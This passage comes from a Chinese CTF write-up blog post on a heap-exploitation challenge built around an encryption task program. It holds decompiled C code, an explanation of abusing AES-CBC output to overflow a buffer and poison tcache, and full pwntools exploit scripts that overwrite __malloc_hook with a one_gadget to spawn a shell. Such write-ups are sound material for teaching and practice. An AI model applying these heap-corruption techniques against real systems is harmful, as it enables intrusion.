class="line"><span class="comment"># 0x55f1b229cfb0----&gt;0x1000</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">4</span>, <span class="number">1</span>, key, iv, <span class="number">0x10</span>, <span class="string">"y"</span>*<span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">5</span>, <span class="number">1</span>, key, iv, <span class="number">0x10</span>, <span class="string">"x"</span>*<span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">6</span>, <span class="number">1</span>, key, iv, <span class="number">0x10</span>, <span class="string">'/bin/sh\x00'</span>.ljust(<span class="number">0x10</span>,<span class="string">'\x00'</span>))</span><br><span class="line"><span class="comment"># 我们构造的结构体，其中含有虚表指针，让其指向one_gadget</span></span><br><span class="line">one_gadget = libc_base+<span class="number">0x10a38c</span></span><br><span class="line">fake_evp_cipher = p64(<span class="number">0x00000010000001ab</span>)+p64(<span class="number">0x0000001000000020</span>)+p64(<span class="number">0x0000000000001002</span>)</span><br><span class="line">fake_evp_cipher += p64(one_gadget)*<span class="number">2</span></span><br><span class="line">fake_evp_cipher += p64(<span class="number">0</span>)+p64(<span class="number">0x108</span>)</span><br><span class="line">fake_evp_cipher = fake_evp_cipher.ljust(<span class="number">0xc0</span>,<span class="string">'\x00'</span>)</span><br><span class="line"><span class="comment"># 也是我们构造的结构体，控制其第一个字段，指向含有虚表指针的结构体</span></span><br><span class="line">add(<span class="number">7</span>, <span class="number">1</span>, key, iv, <span class="number">0xc0</span>, p64(heap_addr+(<span class="number">0x5649bd419540</span><span class="number">-0x5649bd417730</span>+<span class="number">0x10</span>)).ljust(<span class="number">0xc0</span>,<span class="string">'\x00'</span>))</span><br><span class="line">add(<span class="number">8</span>, <span class="number">1</span>, key, iv, <span class="number">0xc0</span>, fake_evp_cipher)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"Choice: "</span>, <span class="string">"3"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Task id : "</span>, <span class="string">"4"</span>)</span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line">delete(<span class="number">5</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># if ATTACH==1:</span></span><br><span class="line"><span class="comment"># 	gdb.attach(p,'''</span></span><br><span class="line"><span class="comment"># 	''')</span></span><br><span class="line">p.sendlineafter(<span class="string">"Choice: "</span>, <span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Task id : "</span>, <span class="string">"4"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Encrypt(1) / Decrypt(2): "</span>, <span class="string">"1"</span>)</span><br><span class="line">p.sendafter(<span class="string">"Key : "</span>, key)</span><br><span class="line">p.sendafter(<span class="string">"IV : "</span>, iv)</span><br><span class="line">p.sendlineafter(<span class="string">"Data Size : "</span>, str(<span class="number">0x70</span>))</span><br><span class="line"><span class="comment"># p.send(p64(heap_addr+(0x55f1b229cfb0-0x55f1b229b4b0)+0x10))</span></span><br><span class="line">fake_task = p64(heap_addr+(<span class="number">0x55843b4a3af0</span><span class="number">-0x55843b4a3730</span>))</span><br><span class="line">fake_task += p64(<span class="number">0x10</span>)</span><br><span class="line">fake_task += p32(<span class="number">1</span>)+key+iv</span><br><span class="line">fake_task += p32(<span class="number">0</span>)+p64(<span class="number">0</span>)*<span class="number">2</span></span><br><span class="line">fake_task += p64(heap_addr+(<span class="number">0x55843b4a5240</span><span class="number">-0x55843b4a3730</span>))</span><br><span class="line">p.send(fake_task)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)</span></span><br><span class="line"><span class="comment"># constraints:</span></span><br><span class="line"><span class="comment">#   rcx == NULL</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x4f322 execve("/bin/sh", rsp+0x40, environ)</span></span><br><span class="line"><span class="comment"># constraints:</span></span><br><span class="line"><span class="comment">#   [rsp+0x40] == NULL</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x10a38c        execve("/bin/sh", rsp+0x70, environ)</span></span><br><span class="line"><span class="comment"># constraints:</span></span><br><span class="line"><span class="comment">#   [rsp+0x70] == NULL</span></span><br></pre></td></tr></table></figure></p>
<h2 id="利用方式二——利用加密功能溢出配合tcache攻击getshell"><a href="#利用方式二——利用加密功能溢出配合tcache攻击getshell" class="headerlink" title="利用方式二——利用加密功能溢出配合tcache攻击getshell"></a>利用方式二——利用加密功能溢出配合tcache攻击getshell</h2><p>这个思路是我最开始想到的思路，当时尝试了一下感觉有点麻烦，赛后把这种方法也调了一遍。</p>
<p>首先信息泄露的方式和<code>利用方式一</code>是一致的，关键在于如何控制程序的流程。</p>
<p>题目给出的libc是2.27版本，该版本可以放心的利用tcache。</p>
<p>程序在最开始的时候分配了一大块的内存（0x1010），该部分内存用来存放加解密得到的结果：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> *<span class="title">init_func</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">void</span> *result; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  signal(<span class="number">14</span>, (<span class="keyword">__sighandler_t</span>)handler);</span><br><span class="line">  alarm(<span class="number">0x20</span>u);</span><br><span class="line">  setvbuf(<span class="built_in">stdin</span>, <span class="number">0L</span>L, <span class="number">2</span>, <span class="number">0L</span>L);</span><br><span class="line">  setvbuf(<span class="built_in">stdout</span>, <span class="number">0L</span>L, <span class="number">2</span>, <span class="number">0L</span>L);</span><br><span class="line">  <span class="comment">//在这里分配的内存</span></span><br><span class="line">  qword_202030 = <span class="built_in">malloc</span>(<span class="number">0x1010</span>uLL);</span><br><span class="line">  result = qword_202030;</span><br><span class="line">  <span class="keyword">if</span> ( !qword_202030 )</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>加解密函数如下：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __fastcall __<span class="function">noreturn <span class="title">start_routine</span><span class="params">(<span class="keyword">void</span> *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v1; <span class="comment">// [rsp+14h] [rbp-2Ch]</span></span><br><span class="line">  __int128 v2; <span class="comment">// [rsp+18h] [rbp-28h]</span></span><br><span class="line">  __int64 v3; <span class="comment">// [rsp+28h] [rbp-18h]</span></span><br><span class="line">  __int64 v4; <span class="comment">// [rsp+30h] [rbp-10h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v5; <span class="comment">// [rsp+38h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v5 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  v2 = (<span class="keyword">unsigned</span> __int64)a1;</span><br><span class="line">  v1 = <span class="number">0</span>;</span><br><span class="line">  v3 = <span class="number">0L</span>L;</span><br><span class="line">  v4 = <span class="number">0L</span>L;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Prepare..."</span>);</span><br><span class="line">  sleep(<span class="number">2u</span>);</span><br><span class="line">  <span class="built_in">memset</span>(qword_202030, <span class="number">0</span>, <span class="number">0x1010</span>uLL);</span><br><span class="line">  <span class="comment">//函数的最后一个参数为task结构体中的data_size字段，表示待加密数据的大小</span></span><br><span class="line">  <span class="comment">//第四个参数为task结构体中的data_ptr字段，指向待加密的数据</span></span><br><span class="line">  <span class="comment">//第二个参数为分配的0x1010大小的内存，用来存放加解密结果</span></span><br><span class="line">  <span class="keyword">if</span> ( !(<span class="keyword">unsigned</span> <span class="keyword">int</span>)EVP_CipherUpdate(</span><br><span class="line">                        *(_QWORD *)(v2 + <span class="number">0x58</span>),</span><br><span class="line">                        qword_202030,</span><br><span class="line">                        &amp;v1,</span><br><span class="line">                        *(_QWORD *)v2,</span><br><span class="line">                        (<span class="keyword">unsigned</span> <span class="keyword">int</span>)*(_QWORD *)(v2 + <span class="number">8</span>)) )</span><br><span class="line">    pthread_exit(<span class="number">0L</span>L);</span><br><span class="line">  *((_QWORD *)&amp;v2 + <span class="number">1</span>) += v1;</span><br><span class="line">  <span class="keyword">if</span> ( !(<span class="keyword">unsigned</span> <span class="keyword">int</span>)EVP_CipherFinal_ex(*(_QWORD *)(v2 + <span class="number">0x58</span>), (<span class="keyword">char</span> *)qword_202030 + *((_QWORD *)&amp;v2 + <span class="number">1</span>), &amp;v1) )</span><br><span class="line">    pthread_exit(<span class="number">0L</span>L);</span><br><span class="line">  *((_QWORD *)&amp;v2 + <span class="number">1</span>) += v1;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Ciphertext: "</span>);</span><br><span class="line">  <span class="comment">//这里根据第三个参数来决定输出加密内容的长度，第二个参数就是之前分配的用来存放加解密结果的内存</span></span><br><span class="line">  printCipher(<span class="built_in">stdout</span>, (__int64)qword_202030, *((<span class="keyword">unsigned</span> __int64 *)&amp;v2 + <span class="number">1</span>), <span class="number">0x10</span>uLL, <span class="number">1u</span>LL);</span><br><span class="line">  pthread_exit(<span class="number">0L</span>L);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>那么，利用的思路就来了，既然已经可以做到控制task结构体的内容，那么我们完全可以控制<code>data_ptr</code>为我们构造好的一块数据，而且程序是根据<code>data_size</code>来确定数据大小的，如果我们把这个值设置的大于0x1010会怎样？？这不就是溢出了嘛，加密后的结果便会覆盖到下一个chunk。</p>
<p>还有一个问题，如何控制加密的结果为我们想要的值？<br>注意到这里采用的是aes-256-cbc模式来加密，cbc模式表示前一个数据块(0x10大小)加密得到的结果用于后一个块的iv向量，那么我们只要知道了0x1010大小的数据内容，对其进行加密，取后16字节数据，就得到了下一个加密块的iv向量，记为<code>next_iv</code>。为了让下一个块加密后的结果为我们指定的值比如<code>p64(0xdeadbeef)+p64(0)</code>，我们只需要用同样的<code>key</code>以及<code>next_iv</code>对<code>p64(0xdeadbeef)+p64(0)</code>进行解密，即可得到我们想要的数据，该数据经加密后得到的结果就是我们想要的结果。</p>
<p>现在可以通过溢出来控制下一个chunk的内容了，结合tcache的利用方式。先通过释放，把下一个chunk放入tcache中，在通过溢出修改下一个chunk的fd字段指向<code>__malloc_hook</code>附近的地址，申请两次就可以拿到<code>__malloc_hook</code>附近的内存了，修改<code>__malloc_hook</code>为<code>one_gadget</code>即可getshell</p>
<p>exp如下：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">decrypt</span><span class="params">(key,iv,cipher)</span>:</span></span><br><span class="line">	cp = AES.new(key,AES.MODE_CBC, iv)</span><br><span class="line">	<span class="keyword">return</span> cp.decrypt(cipher)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">encrypt</span><span class="params">(key,iv,plain)</span>:</span></span><br><span class="line">	cp = AES.new(key,AES.MODE_CBC, iv)</span><br><span class="line">	<span class="keyword">return</span> cp.encrypt(plain)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(task_id,flag,key,iv,size,data)</span>:</span></span><br><span class="line">	p.sendlineafter(<span class="string">"Choice: "</span>, <span class="string">"1"</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">"Task id : "</span>, str(task_id))</span><br><span class="line">	p.sendlineafter(<span class="string">"Encrypt(1) / Decrypt(2): "</span>, str(flag))</span><br><span class="line">	p.sendafter(<span class="string">"Key : "</span>,key)</span><br><span class="line">	p.sendafter(<span class="string">"IV : "</span>, iv)</span><br><span class="line">	p.sendlineafter(<span class="string">"Data Size : "</span>, str(size))</span><br><span class="line">	p.sendafter(<span class="string">"Data : "</span>, data)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(task_id)</span>:</span></span><br><span class="line">	p.sendlineafter(<span class="string">"Choice: "</span>, <span class="string">"2"</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">"Task id : "</span>, str(task_id))</span><br><span class="line"></span><br><span class="line">ATTACH=<span class="number">0</span></span><br><span class="line">DEBUG = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> DEBUG:</span><br><span class="line">	context.log_level = <span class="string">'debug'</span></span><br><span class="line">	context.terminal = [<span class="string">'tmux'</span>, <span class="string">'split'</span>, <span class="string">'-h'</span>]</span><br><span class="line">	libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line">	p = process(<span class="string">"./task"</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	context.log_level = <span class="string">'debug'</span></span><br><span class="line">	libc = ELF(<span class="string">'./libc-2.27.so'</span>)</span><br><span class="line">	p = remote(<span class="string">'111.186.63.201'</span>,<span class="number">10001</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">key = <span class="string">"1"</span>*<span class="number">0x20</span></span><br><span class="line">iv = <span class="string">"1"</span>*<span class="number">0x10</span></span><br><span class="line"><span class="comment">#context.log_level="debug"</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># leak libc and heap addr</span></span><br><span class="line">add(<span class="number">10</span>,<span class="number">1</span>, key, iv, <span class="number">0x30</span>, <span class="string">"x"</span>*<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">0</span>, <span class="number">1</span>, key, iv, <span class="number">0x410</span>, <span class="string">"x"</span>*<span class="number">0x410</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">1</span>, key, iv, <span class="number">0x10</span>, <span class="string">"y"</span>*<span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">2</span>, <span class="number">1</span>, key, iv, <span class="number">0x410</span>, <span class="string">"x"</span>*<span class="number">0x410</span>)</span><br><span class="line">add(<span class="number">3</span>, <span class="number">1</span>, key, iv, <span class="number">0x10</span>, <span class="string">"y"</span>*<span class="number">0x10</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"Choice: "</span>, <span class="string">"3"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Task id : "</span>, <span class="string">"0"</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">add(<span class="number">2</span>, <span class="number">1</span>, key, iv, <span class="number">0x500</span>, <span class="string">"c"</span>*<span class="number">0x500</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"Choice: "</span>, <span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Task id : "</span>, <span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Encrypt(1) / Decrypt(2): "</span>, <span class="string">"1"</span>)</span><br><span class="line">p.sendafter(<span class="string">"Key : "</span>, key)</span><br><span class="line">p.sendafter(<span class="string">"IV : "</span>, iv)</span><br><span class="line">p.sendlineafter(<span class="string">"Data Size : "</span>, str(<span class="number">0x410</span>))</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"Ciphertext: \n"</span>)</span><br><span class="line">x = p.recv(<span class="number">49</span>*<span class="number">10</span>)</span><br><span class="line">cipher = x.replace(<span class="string">" "</span>,<span class="string">""</span>).replace(<span class="string">"\n"</span>,<span class="string">""</span>)</span><br><span class="line"></span><br><span class="line">libc_addr = u64(decrypt(key, iv, cipher.decode(<span class="string">"hex"</span>))[<span class="number">0</span>:<span class="number">8</span>].ljust(<span class="number">8</span>,<span class="string">"\x00"</span>))</span><br><span class="line">heap_addr = u64(decrypt(key, iv, cipher.decode(<span class="string">"hex"</span>))[<span class="number">8</span>:<span class="number">16</span>].ljust(<span class="number">8</span>,<span class="string">"\x00"</span>))</span><br><span class="line">libc_base = libc_addr<span class="number">-0x3ec090</span></span><br><span class="line">system_addr = libc_base+libc.symbols[<span class="string">'system'</span>]</span><br><span class="line"></span><br><span class="line">print(hex(libc_addr))</span><br><span class="line">print(hex(heap_addr))</span><br><span class="line">print(hex(libc_base))</span><br><span class="line">p.send(<span class="string">'a'</span>*<span class="number">0x410</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># generate next_cipher, witch encrypt(key,iv,plaintext+next_cipher)[-16:]==&gt;p64(fake_fd)+p64(0)</span></span><br><span class="line">fake_fd = libc_base+libc.symbols[<span class="string">'__malloc_hook'</span>]<span class="number">-0x60</span></span><br><span class="line">plaintext = <span class="string">'a'</span>*<span class="number">0x1000</span>+p64(<span class="number">0</span>)+p64(<span class="number">0x81</span>)</span><br><span class="line">next_iv = encrypt(key,iv,plaintext)[<span class="number">-16</span>:]</span><br><span class="line">next_cipher = decrypt(key,next_iv,p64(<span class="number">0</span>)+p64(<span class="number">0x81</span>))</span><br><span class="line">next_iv_1 = p64(<span class="number">0</span>)+p64(<span class="number">0x81</span>)</span><br><span class="line">next_cipher += decrypt(key,next_iv_1,p64(fake_fd)+p64(<span class="number">0</span>))</span><br><span class="line">next_plaintext = encrypt(key,iv,plaintext+next_cipher)[<span class="number">-32</span>:]</span><br><span class="line"></span><br><span class="line">print(<span class="string">''</span>.join((<span class="string">r'\x%2x'</span>%ord(c)<span class="keyword">for</span> c <span class="keyword">in</span> next_iv)))</span><br><span class="line">print(<span class="string">''</span>.join((<span class="string">r'\x%2x'</span>%ord(c)<span class="keyword">for</span> c <span class="keyword">in</span> next_cipher)))</span><br><span class="line">print(<span class="string">''</span>.join((<span class="string">r'\x%2x'</span>%ord(c)<span class="keyword">for</span> c <span class="keyword">in</span> next_plaintext)))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">4</span>,<span class="number">1</span>,key,iv,<span class="number">0x30</span>,<span class="string">'a'</span>*<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">1</span>,key,iv,<span class="number">0x30</span>,<span class="string">'a'</span>*<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">6</span>,<span class="number">1</span>,key,iv,<span class="number">0x1000</span>,<span class="string">'a'</span>*<span class="number">0x1000</span>)</span><br><span class="line">add(<span class="number">7</span>,<span class="number">1</span>,key,iv,<span class="number">0x30</span>,<span class="string">'a'</span>*<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">8</span>,<span class="number">1</span>,key,iv,<span class="number">0x30</span>,<span class="string">'a'</span>*<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">9</span>,<span class="number">1</span>,key,iv,<span class="number">0x30</span>,<span class="string">'a'</span>*<span class="number">0x30</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># put chunk to tcache</span></span><br><span class="line">delete(<span class="number">10</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># modify task 7's memory to next_cipher, make encrypt result to overwrite tcache's fd field</span></span><br><span class="line">delete(<span class="number">7</span>)</span><br><span class="line">delete(<span class="number">8</span>)</span><br><span class="line">payload = next_cipher</span><br><span class="line">payload = payload.ljust(<span class="number">0x70</span>,<span class="string">'\x00'</span>)</span><br><span class="line">add(<span class="number">8</span>,<span class="number">1</span>,key,iv,<span class="number">0x70</span>,payload)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"Choice: "</span>, <span class="string">"3"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Task id : "</span>, <span class="string">"4"</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line">delete(<span class="number">5</span>)</span><br><span class="line">fake_task = p64(heap_addr+(<span class="number">0x555555759ff0</span><span class="number">-0x555555758730</span>+<span class="number">0x10</span>))</span><br><span class="line">fake_task += p64(<span class="number">0x1000</span>+<span class="number">0x30</span>)</span><br><span class="line">fake_task += p32(<span class="number">1</span>)+key+iv</span><br><span class="line">fake_task += p32(<span class="number">0</span>)+p64(<span class="number">0</span>)*<span class="number">2</span></span><br><span class="line">fake_task += p64(heap_addr+(<span class="number">0x555555759e30</span><span class="number">-0x555555758730</span>+<span class="number">0x10</span>))</span><br><span class="line">p.sendlineafter(<span class="string">"Choice: "</span>, <span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Task id : "</span>, <span class="string">"4"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Encrypt(1) / Decrypt(2): "</span>, <span class="string">"1"</span>)</span><br><span class="line">p.sendafter(<span class="string">"Key : "</span>, key)</span><br><span class="line">p.sendafter(<span class="string">"IV : "</span>, iv)</span><br><span class="line">p.sendlineafter(<span class="string">"Data Size : "</span>, str(<span class="number">0x70</span>))</span><br><span class="line">p.recvuntil(<span class="string">'Data : '</span>)</span><br><span class="line">p.send(fake_task)</span><br><span class="line"></span><br><span class="line">time.sleep(<span class="number">2</span>)</span><br><span class="line">p.send(<span class="string">'a'</span>*(<span class="number">0x70</span>-len(fake_task)))</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ATTACH==<span class="number">1</span>:</span><br><span class="line">	gdb.attach(p,<span class="string">'''</span></span><br><span class="line"><span class="string">	b *0x555555554000+0x1731</span></span><br><span class="line"><span class="string">	b *0x555555554000+0x1498</span></span><br><span class="line"><span class="string">	b *0x555555554000+0x13be</span></span><br><span class="line"><span class="string">	'''</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># # __free_hook</span></span><br><span class="line"><span class="comment"># # payload = p64(libc_base+libc.symbols['system'])</span></span><br><span class="line"><span class="comment"># payload = p64(libc_base+0x10a38c)</span></span><br><span class="line"><span class="comment"># add(10,1,key,iv,0x70,payload.ljust(0x70,'\x00'))</span></span><br><span class="line"><span class="comment"># delete(10)</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># __malloc_hook</span></span><br><span class="line">payload = <span class="string">'\x00'</span>*<span class="number">0x60</span>+p64(libc_base+<span class="number">0x10a38c</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0x70</span>,<span class="string">'\x00'</span>)</span><br><span class="line">add(<span class="number">10</span>,<span class="number">1</span>,key,iv,<span class="number">0x70</span>,payload)</span><br><span class="line">p.sendlineafter(<span class="string">"Choice: "</span>, <span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Task id : "</span>, <span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Encrypt(1) / Decrypt(2): "</span>, <span class="string">"1"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)</span></span><br><span class="line"><span class="comment"># constraints:</span></span><br><span class="line"><span class="comment">#   rcx == NULL</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x4f322 execve("/bin/sh", rsp+0x40, environ)</span></span><br><span class="line"><span class="comment"># constraints:</span></span><br><span class="line"><span class="comment">#   [rsp+0x40] == NULL</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x10a38c        execve("/bin/sh", rsp+0x70, environ)</span></span><br><span class="line"><span class="comment"># constraints:</span></span><br><span class="line"><span class="comment">#   [rsp+0x70] == NULL</span></span><br></pre></td></tr></table></figure></p>
<p>最后附上题目的下载链接：</p>
<p>链接：<a href="https://pan.baidu.com/s/1VQShtF_PQ-iJrcOjdGBysg" target="_blank" rel="noopener">https://pan.baidu.com/s/1VQShtF_PQ-iJrcOjdGBysg</a><br>提取码：3os6 </p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/12/04/hitcon/baby_tcache/" rel="next" title="hitconctf-baby_tcache">
                <i class="fa fa-chevron-left"></i> hitconctf-baby_tcache
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
